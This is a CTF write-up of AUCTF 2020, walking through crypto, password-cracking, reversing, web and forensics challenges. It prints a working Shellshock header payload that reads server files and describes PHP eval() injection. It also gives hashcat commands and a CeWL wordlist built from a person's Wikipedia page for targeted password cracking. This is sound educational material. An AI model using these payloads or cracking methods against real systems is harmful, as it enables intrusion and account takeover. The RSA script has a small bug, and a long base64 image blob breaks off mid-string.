AUCTF 2020 Writeup

I recently competed in a CTF  in a team with Monash University's cyber security club Monsec, in which we managed to place ninth out of over 1,000 teams by solving 76 out of the 81 offered challenges.

This was an interesting event for a number of reasons, being the first event I've participated in with Monsec, along with AUCTF being the first publicly hosted CTF held by Auburn University. Furthermore, this competition featured a seperate 'password cracking' category of challenges, which is more common to see incorporated into other categories. Many of the challenges in this competition were solved by other members of the team, so I will primarily walk through the solutions of the challenges that I was involved in or aware of. This competition also involved a range of sequence guessing and trivia questions which I will not be explaining, but you can read about from the official GitHub repo if you wish.

Cryptography

As is often the case, the first few challenges in each category were very simple. Here, the first flag was simply encoded in base 64.

$ echo YXVjdGZ7NExMX3kwVXJfQjQ1M19SX2IzbDBOZ18yX3VTXzEyNGRmMnNkYXN2fQ== \
> | base64 -d
auctf{4LL_y0Ur_B453_R_b3l0Ng_2_uS_124df2sdasv}

The next challenge was of a similar difficulty with the flag being shifted in a caesar cipher. Shifting all of the characters down by 5 resulted in a flag of auctf{jU5t_4_W4rM_uP_1_4421_9952}.

The Google Drive link gave the following list of numbers:

[145213650433152, 4562349440334, 24272724667960, 598242834066721, 89584939111364, 426756492371444, 511701778613016, 551732685650248, 296367799892003, 63113462897284, 198510931603899, 321201931522255, 401044612595398, 542697603423052, 213898535689643, 275839755798105, 185841409622217, 551732685650248, 121188708737752, 401044612595398, 512808963720303, 275839755798105, 198510931603899, 275839755798105, 401044612595398, 174484844253615, 551732685650248, 174486913717420, 575163265381617, 213898535689643, 401044612595398, 49103824223436, 551732685650248, 401044612595398, 598242834066721, 202722428784490, 306606077829794, 53801100921263, 401044612595398, 184805755675232, 405971446461049, 296367799892003, 275839755798105, 275839755798105, 401044612595398, 358054299396778, 4562349440334, 320837325468842, 401044612595398, 202722428784490, 551732685650248, 321201931522255, 228350651363859]

Here, the respective numbers 627585038806247 and 65537 were clearly referring to the RSA cryptosystem, the numbers, 'n' and 'e' being the Modulus and Public Exponent that make up a Public Key. This public key was fairly weak though, as N was only 50 bits long, while 1024 or 2048 bits is typical the minimum.

Finding the prime factors of N was fairly trivial, with FactorDB returning 13458281 and 46631887 referred to as 'p' and 'q', which make up the corresponding RSA Private Key. From here, the message could be decoded easily.

from Crypto.Util.number import *

m = [145213650433152, 4562349440334, 24272724667960, 598242834066721, 89584939111364, 426756492371444, 511701778613016, 551732685650248, 296367799892003, 63113462897284, 198510931603899, 321201931522255, 401044612595398, 542697603423052, 213898535689643, 275839755798105, 185841409622217, 551732685650248, 121188708737752, 401044612595398, 512808963720303, 275839755798105, 198510931603899, 275839755798105, 401044612595398, 174484844253615, 551732685650248, 174486913717420, 575163265381617, 213898535689643, 401044612595398, 49103824223436, 551732685650248, 401044612595398, 598242834066721, 202722428784490, 306606077829794, 53801100921263, 401044612595398, 184805755675232, 405971446461049, 296367799892003, 275839755798105, 275839755798105, 401044612595398, 358054299396778, 4562349440334, 320837325468842, 401044612595398, 202722428784490, 551732685650248, 321201931522255, 228350651363859]

n = 627585038806247
e = 65537

p = 13458281
q = 46631887

phi = (p-1)*(q-1)
d = inverse(e,phi)
output = ''
for i in c:
    output += long_to_bytes(pow(i,d,n))
print output
>auctf{R34lLy_Pr1M3s_w1L1_n3vEr_b3_thI5_Sm411_BuT_h3y}

This links to a very large slab of text that is encoded in some way:

Here, the punctuation, formatting and word size seems consistent with natural language, indicating that this was some form of Substitution Cipher. After trying a variety of frequency-analysis tools for differing ciphers, we got the following text:

This still seems like gibberish, although there are some words which are possible to make out, and so we were able to discern that this was a Vigenère cipher. After trying various key lengths, we eventually found the key coincidencesmayhelpyousolvethisproblem, giving us a legible message.

Thus, we got the flag: auctf{sometimes_you_have_to_do_things_yourself).

Password Cracking

The first password cracking challenge was rather simple, giving an md5 hash to reverse. As this hash was already in a pre-computed lookup table, putting this into crackstation station instantly returned the password and flag bad4ever.

For the next challenge, we were once again given an md5 hash. However, this hash included a salt which prevented the use of a lookup table. To crack this, we assumed the hash 5eaff45e09bec5222a9cfa9502a4740d:1337 was in the format md5($salt.$pass) and cracked it using Hashcat with the parameters:

hashcat -a 0 -m 20 hash.txt rockyou.txt

In less than a second, we got the flag and password 'treetop'.

In this challenge, we were given a single encrypted .zip file, 'zippy.zip', inside of which, contained another zip file 'unzipme.zip'

Using the tool 'John the Ripper', we extracted the hash from the .zip file and ran in through hashcat with the parameters:

hashcat -a 0 -m 13600 hash.txt rockyou.txt

Giving us a password of 8297018229. Once unencrypted, the next .zip file contained another encrypted file, named 'do_it_again.zip'.

Repeating this process another five times, decrypting each nested encrypted .zip file, we finally get a file 'flag.txt', which contained the flag y0ud1d17#15789.

The next challenge contained the single hash

b1ee3fbc44b4ba721273699ac4511fa1631257f37da7bede3d5ba7bda5e7f96f1bab30e206caf47a5ce8c6587d0fbd6306e70b08a3a7e7233bb707bf21752c33

A hash analyser suggested that this hash was of type SHA2-512, and so we tried to reverse this hash through hashcat with the parameters:

hashcat -a 0 -m 1700 hash.txt rockyou.txt

However this returned no results after a considerable amount of time, and so we assumed that we guessed the hash type wrong. After trying several different hash types such as Whirlpool and Keccak-512, we eventually got the result through guessing SHA3-512 by running:

hashcat -a 0 -m 17600 hash.txt rockyou.txt

Resulting in guessing the password and flag gardener.

This next challenge gave a .kdbx file which is a KeePass database. Once again we could extract the hash using John the Ripper to run through Hashcat. The prompt includes the hint that the password is entirely numeric, which means that we will not be able to use a wordlist-based approach like the other challenges. Instead we just bruteforce all of the possible numbers. From trial and error, we eventually figure out that the password is 6 digits long and were able to crack it in 12 seconds.

Finally getting a password and flag of 157865.

This next challenge, 'Keanu' was very interesting. Statistically it was the most difficult challenge in the competition:

I'm proud to say that I was the first person in the competition to solve this challenge, and for nearly a day, Monsec was the only team to have solved it.

This lead to people reaching out to me and bargaining for hints:

The reason this challenge was so difficult is that it presented a realistic md5-encoded password that belonged to individual. Because this password was somewhat-complex and did not already exist in a wordlist like rockyou.txt, we had to take an approach other than a dictionary-based or bruteforce attack, as we had been doing previously.

To solve this, we created a custom wordlist using the tool CeWl to scrape Keanu Reeves' wikipedia page with the following command:

cewl -d 0 -w words.txt https://en.wikipedia.org/wiki/Keanu_Reeves

After building the custom wordlist, we ran it through Hashcat's rules files to apply some semi-random transformations to make the wordlist more accurate to typical passwords with the following:

hashcat --stdout --rules-file rules/one.rule words.txt | uniq -u >> keanuwordlist.txt

(I got one.rule from Here).

After doing this,I ran this new transformed wordlist through hashcat with the following command:

hashcat64.exe -a 0 -m 0 hash.txt keanuwordlist.txt -r rules/one.rule -w 3 -O

In doing so, I double applied the rules list giving some more random transformations to the passwords as Hashcat guesses them. Hashcat then ran for around 3 minutes before finding the password '[email protected]'.

Reversing

The first few reversing challenges were very simple. This challenge gave a link to a file mobile0.apk, which is an Android APK file with a flag hidden somewhere in it. I'm pretty sure the intended solution was to use an Android app decompiler. However, as we knew the flag format, we ended up finding the flag by running the following:

$ strings mobile0.apk | grep -i auctf{
auctf{m0b1le_r3v3rs1ng!!}

This was a fairly similar to the mobile0 challenge. We were given an .ipa file mobile1.ipa for iOS. As ipa files contain compressed information, we unzipped the folder and got the following directory:

.
└── Payload
    └── mobile1.app
        ├── Base.lproj
        │   ├── LaunchScreen.storyboardc
        │   │   ├── 01J-lp-oVM-view-Ze5-6b-2t3.nib
        │   │   ├── Info.plist
        │   │   └── UIViewController-01J-lp-oVM.nib
        │   └── Main.storyboardc
        │       ├── BYZ-38-t0r-view-8bC-Xf-vdC.nib
        │       ├── Info.plist
        │       └── UIViewController-BYZ-38-t0r.nib
        ├── Info.plist
        ├── PkgInfo
        ├── _CodeSignature
        │   └── CodeResources
        └── mobile1

After some looking around, we found the flag by running the following command in Payload/mobile1.app/:

$ strings Info.plist | grep -i auctf{
#auctf{i0s_r3v3rs1ng_1s_1nt3r3st1ng}

Web

For this challenge, we were given a link to a website running a simple calculator.

Now, we can try to input an invalid expression, such as a division by zero:

From this error message, we can tell that the server is executing the user's input inside the php function Eval(), which means that we can possibly perform code injection on the server. There are multiple ways to get the flag from this point such as using built-in functions such as get_defined_vars() to find what variables are defined on the server's end. However, we ended up getting the flag by guessing the variable $flag, getting the flag auctf{p6p_1nj3c7i0n_iz_k3wl}.

M1 Abrams was the final Web challenge, giving a link to a default Apache web server, however the server has since been taken offline and so I cannot demonstrate the attack.

Running Dirbuster on the server eventually found the link /cgi-bin. Running it again from this directory located /cgi-bin/serverlet. Here, we guessed that the vulnerability was related to Shellshock, CVE-2014-6271. Through sending custom requests to the server, we changed the User-Agent header to  () { :;}; echo; /bin/ls /, which then returned with a list of files at the root directory, indicating that we had remote code execution.

bin
boot
dev
etc
flag.file
home
liv
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

By sending the command () { :;}; echo; /bin/cat /flag.file, we were able to read the contents of the file flag.file, which returned the result

1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c93036348c0fce30f08ecf358eaf72484989ace502005a5da5461b000000

Analysing this result with CyberChef indicated that it was a hex-encoded gzip file, and so the file flag.txt could be extracted as such:

$ echo 1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c93036348c0fce30f08ecf358eaf72484989ace502005a5da5461b000000 \
> temp
$ xxd -r -p temp > flag.gz
gunzip flag.gz
cat flag
auctf{$h311_Sh0K_m3_z@ddY}

Forensics

Viewing the attached file, we can see a base 64 encoded png file:

We can export this information to a png with the command:

echo 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